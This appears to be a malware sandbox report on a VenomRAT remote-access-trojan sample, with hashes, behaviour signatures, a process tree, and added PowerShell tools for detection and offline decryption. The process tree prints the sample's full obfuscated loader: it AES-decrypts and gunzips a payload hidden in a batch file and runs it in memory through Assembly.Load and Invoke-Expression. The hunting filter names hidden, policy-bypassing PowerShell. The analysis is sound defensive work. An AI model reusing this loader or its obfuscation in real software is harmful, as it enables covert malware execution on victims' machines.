Analysis
max time kernel: 109s
max time network: 17s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 15-04-2024 16:24
Behavioral task: behavioral1
Sample: VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Resource: win7-20240221-en
Behavioral task: behavioral2
Sample: VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Resource: win10v2004-20240611-en
General
Target: VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Size: 26.1MB
MD5: a8776c9984c7b6c4f18bf0505ca939b5
SHA1: e23a41b6f03f11d3b6a64d5645fa102f373bd292
SHA256: 5dbb0f9df5fc34b49f0e284afe9037206c29dd8e50f0adbbcca785dcca89592e
SHA512: 9ebb8d42d1649cb2b3e97bd703d5daa4b1a87f21949c279335f5b0ee834ef185be473e23f82f0562a0f22c1e54675259113c6555976aee5b5def2087b34a8398
SSDEEP: 786432:/h9/AxUNfm9O7HYazcKB9rZsiqS+r+/hGykCCU1:/h9YxUNpTYGRQGhGykCC
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Executes dropped EXE (1 IoCs)
  Processes:
    pid   process
    2636  Venom RAT + HVNC + Stealer + Grabber.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    2280  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2280  powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (each write was recorded three times; 15 events in total):
    description                       pid   process                                   target process                            count
    PID 1736 wrote to memory of 2712  1736  Venom RAT + HVNC + Stealer + Grabber.exe  cmd.exe                                   3
    PID 1736 wrote to memory of 2636  1736  Venom RAT + HVNC + Stealer + Grabber.exe  Venom RAT + HVNC + Stealer + Grabber.exe  3
    PID 2636 wrote to memory of 2860  2636  Venom RAT + HVNC + Stealer + Grabber.exe  WerFault.exe                              3
    PID 2712 wrote to memory of 2432  2712  cmd.exe                                   cmd.exe                                   3
    PID 2712 wrote to memory of 2280  2712  cmd.exe                                   powershell.exe                            3
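The signatures above name the behaviour; the process tree that follows carries the concrete strings a defender can turn into detection logic. The script below is an added hunting filter, not part of the sandbox report, that applies three conditions taken from that tree to process-creation records: a batch file run from a user's AppData directory, PowerShell source echoed through cmd.exe with method names stitched back together by .Replace() and executed via Invoke-Expression, and powershell.exe spawned by cmd.exe with -ep bypass and -windowstyle hidden. The records are constructed to mirror the report's tree (the loader command line is abbreviated), the field names follow Sysmon Event ID 1 as an assumption about the telemetry, and one benign record is included so the filter is shown to leave ordinary scripted administration alone.

```powershell
# Added example (not part of the sandbox report): hunting filter for the
# cmd.exe -> powershell.exe loader stage seen in this sample's process tree.
# Records are constructed from the tree; with real telemetry replace $Records by
# a Get-WinEvent query and map the fields (Sysmon Event ID 1 names assumed here).
$Records = @(
    [pscustomobject]@{ ProcessId = 1736; ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe'
        CommandLine = '"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"' }
    [pscustomobject]@{ ProcessId = 2712
        ParentImage = 'C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe'
        Image       = 'C:\Windows\system32\cmd.exe'
        CommandLine = 'cmd /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "' }
    [pscustomobject]@{ ProcessId = 2432; ParentImage = 'C:\Windows\system32\cmd.exe'
        Image       = 'C:\Windows\system32\cmd.exe'
        # Abbreviated, constructed copy of the echoed loader: keeps the tell-tale fragments.
        CommandLine = 'C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))(''QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY=''); } function mReVh($NRwiA,$dHouc){ foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU }; } "' }
    [pscustomobject]@{ ProcessId = 2280; ParentImage = 'C:\Windows\system32\cmd.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden' }
    # Constructed benign record: scheduled inventory script, must not be flagged.
    [pscustomobject]@{ ProcessId = 4242; ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\inventory.ps1' }
)

function Test-LoaderChain {
    # Returns the list of reasons a single process-creation record looks like this loader.
    param([Parameter(Mandatory)][pscustomobject]$Record)
    $cl = [string]$Record.CommandLine
    $reasons = @()

    # 1. cmd.exe running a .bat out of a user-writable profile directory.
    if ($Record.Image -match 'cmd\.exe$' -and
        $cl -match '(?i)\\AppData\\(Roaming|Local)\\[^"]*\.bat') {
        $reasons += 'batch file launched from AppData'
    }
    # 2. Script source echoed through cmd.exe, with string-splitting obfuscation
    #    (.Replace("@","") / .Replace('#','')) and Invoke-Expression.
    if ($Record.Image -match 'cmd\.exe$' -and $cl -match '(?i)echo\s+function' -and
        $cl -match '\.Replace\((["''])\W\1,\s*(["''])\2\)' -and
        $cl -match '(?i)Invoke-Expression') {
        $reasons += 'obfuscated PowerShell echoed via cmd.exe'
    }
    # 3. powershell.exe parented by cmd.exe with policy bypass and a hidden window.
    if ($Record.Image -match 'powershell\.exe$' -and $Record.ParentImage -match 'cmd\.exe$' -and
        $cl -match '(?i)-e(p|xecutionpolicy)\s+bypass' -and
        $cl -match '(?i)-w(indowstyle)?\s+hidden') {
        $reasons += 'hidden PowerShell with ExecutionPolicy bypass spawned by cmd.exe'
    }
    return ,$reasons
}

$Alerts = foreach ($r in $Records) {
    $hits = Test-LoaderChain -Record $r
    if ($hits.Count -gt 0) {
        [pscustomobject]@{
            ProcessId = $r.ProcessId
            Image     = Split-Path -Leaf -Path $r.Image
            Reasons   = ($hits -join '; ')
        }
    }
}
$Alerts | Format-Table -AutoSize
```

Run as-is, the filter lists the two cmd.exe processes and the hidden powershell.exe from the tree and leaves the top-level dropper and the benign inventory script alone. Each condition is deliberately narrow enough to read on its own; the point of the three together is that the chain appears in one parent/child lineage, so in a SIEM they are best joined on ParentProcessId rather than alerted on individually.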
Processes
[depth 1] C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe (PID 1736)
  Command line: "C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\cmd.exe (PID 2712)
    Command line: cmd /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\cmd.exe (PID 2432)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2280)
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [depth 2] C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe (PID 2636)
    Command line: "C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\WerFault.exe (PID 2860)
      Command line: C:\Windows\system32\WerFault.exe -u -p 2636 -s 528
[depth 1] C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
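The cmd.exe command line at depth 3 is the loader for the next stage. It echoes a PowerShell script into the hidden powershell.exe, which reads Venom.bat, takes the first line beginning with the seven-character marker SEROXEN, base64-decodes the remainder, decrypts it with AES-256-CBC and PKCS7 padding using the key and IV hard-coded in the script, GZip-decompresses the result and passes the bytes to [System.Reflection.Assembly]::Load, then invokes the assembly's entry point with the path of Venom.bat as its only argument. Method names such as FromBase64String, Load and ReadAllText are written with '@' between every character and reassembled with .Replace(), and the GZipStream constructor is built the same way with '#', so a plain string match on those names misses them. The script below is an added analyst tool, not part of the sandbox report or of the malware: it repeats the three transforms on a Venom.bat offline, writes the decrypted assembly to disk and hashes it, and never calls Assembly.Load. The key and IV are copied from the command line above; the output file name and the -SelfTest mode, which fabricates a stand-in Venom.bat around a dummy payload with the same key and IV so the pipeline can be exercised without the sample, are assumptions of this example.

```powershell
# Added example (analyst tooling, not part of the sandbox report or the malware):
# reproduce the loader's transforms offline - base64 -> AES-256-CBC/PKCS7 -> GZip -
# on the dropped Venom.bat, write the resulting .NET assembly to disk and hash it.
# Nothing here loads or executes the decrypted bytes. Run only in an isolated VM.
param(
    [string]$BatPath = 'C:\Users\Admin\AppData\Roaming\Venom.bat',                         # drop path from the report
    [string]$OutPath = (Join-Path ([IO.Path]::GetTempPath()) 'venom_stage2.bin'),         # assumed output name
    [switch]$SelfTest                                                                     # build a constructed Venom.bat first
)

# Key (32 bytes) and IV (16 bytes), copied verbatim from the echoed loader script.
$Key = [Convert]::FromBase64String('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY=')
$IV  = [Convert]::FromBase64String('odLQJwhJTyobsFXcB4hGIA==')

function New-AesCbc {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key; $aes.IV = $IV
    return $aes
}

function ConvertFrom-SeroxenBlob {
    # Same selection rule as the loader: first line starting with 'SEROXEN',
    # everything after the 7-character marker is base64 ciphertext.
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line.StartsWith('SEROXEN')) {
            $blob = [Convert]::FromBase64String($line.Substring(7))
            return ,$blob
        }
    }
    throw "No line starting with 'SEROXEN' in $BatPath"
}

function Invoke-AesDecrypt {
    param([byte[]]$Data)
    $aes = New-AesCbc; $dec = $aes.CreateDecryptor()
    try   { $plain = $dec.TransformFinalBlock($Data, 0, $Data.Length); return ,$plain }
    finally { $dec.Dispose(); $aes.Dispose() }
}

function Expand-GzipBytes {
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try   { $gz.CopyTo($out); $bytes = $out.ToArray(); return ,$bytes }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

function New-ConstructedBat {
    # Constructed test data only: GZip + AES-encrypt a dummy 'MZ...' blob with the
    # loader's key/IV and embed it behind the SEROXEN marker, as the real file does.
    param([string]$Path)
    $dummy = [System.Text.Encoding]::ASCII.GetBytes('MZ' + ('x' * 62))
    $ms = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Compress)
    $gz.Write($dummy, 0, $dummy.Length); $gz.Dispose()          # Dispose flushes the GZip footer
    $zipped = $ms.ToArray(); $ms.Dispose()
    $aes = New-AesCbc; $enc = $aes.CreateEncryptor()
    $cipher = $enc.TransformFinalBlock($zipped, 0, $zipped.Length)
    $enc.Dispose(); $aes.Dispose()
    $lines = [string[]]@('@echo off', 'rem decoy batch content', 'SEROXEN' + [Convert]::ToBase64String($cipher))
    [System.IO.File]::WriteAllLines($Path, $lines)
}

if ($SelfTest) {
    $BatPath = Join-Path ([IO.Path]::GetTempPath()) 'constructed_venom.bat'
    New-ConstructedBat -Path $BatPath
}

$cipherBytes = ConvertFrom-SeroxenBlob ([System.IO.File]::ReadAllLines($BatPath))
$payload     = Expand-GzipBytes (Invoke-AesDecrypt $cipherBytes)
[System.IO.File]::WriteAllBytes($OutPath, $payload)

# Checks before handing the blob to a .NET decompiler: MZ header and a hash to pivot on.
$isPe = $payload.Length -gt 2 -and $payload[0] -eq 0x4D -and $payload[1] -eq 0x5A
$hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $OutPath).Hash
'{0} bytes -> {1}; MZ header: {2}; SHA256: {3}' -f $payload.Length, $OutPath, $isPe, $hash
```

Point -BatPath at the Venom.bat listed under Downloads to recover this sample's second stage; the key and IV are whatever the echoed script of the sample in front of you carries, so take them from its command line rather than assuming they are stable across builds. The loader splits the file with Split([Environment]::NewLine), which on .NET Framework splits on the individual '\r' and '\n' characters and produces empty lines; ReadAllLines is used here because only the SEROXEN-prefixed line matters.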
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe
  Filesize: 14.2MB
  MD5: 3b3a304c6fc7a3a1d9390d7cbff56634
  SHA1: e8bd5244e6362968f5017680da33f1e90ae63dd7
  SHA256: 7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
  SHA512: 7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5
- C:\Users\Admin\AppData\Roaming\Venom.bat
  Filesize: 11.9MB
  MD5: 04fd97b8a5d2132eee84f856ee0fa938
  SHA1: 0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
  SHA256: bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
  SHA512: e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778
- memory/1736-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmp
  Filesize: 4KB
- memory/1736-1-0x0000000001070000-0x0000000002A9A000-memory.dmp
  Filesize: 26.2MB
- memory/1736-2-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
  Filesize: 9.9MB
- memory/1736-19-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
  Filesize: 9.9MB
- memory/2280-24-0x000000001B790000-0x000000001BA72000-memory.dmp
  Filesize: 2.9MB
- memory/2280-25-0x00000000027E0000-0x00000000027E8000-memory.dmp
  Filesize: 32KB
- memory/2636-17-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
  Filesize: 9.9MB
- memory/2636-18-0x00000000006C0000-0x00000000014F4000-memory.dmp
  Filesize: 14.2MB
- memory/2636-26-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
  Filesize: 9.9MB
- memory/2636-28-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
  Filesize: 9.9MB